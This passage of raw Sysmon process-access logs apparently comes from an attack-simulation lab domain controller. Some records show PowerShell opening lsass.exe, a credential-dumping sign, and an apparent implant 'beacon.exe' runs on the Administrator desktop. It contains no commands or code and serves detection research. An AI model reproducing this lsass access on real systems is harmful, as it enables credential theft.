C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238508Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-95AA-00000000AD01}6528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238507Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-95AA-00000000AD01}6528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238506Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238505Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238504Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238503Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238502Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238501Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238500Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238499Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238498Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238497Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238496Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238495Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238494Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238493Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238492Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238491Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238490Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238489Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238488Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 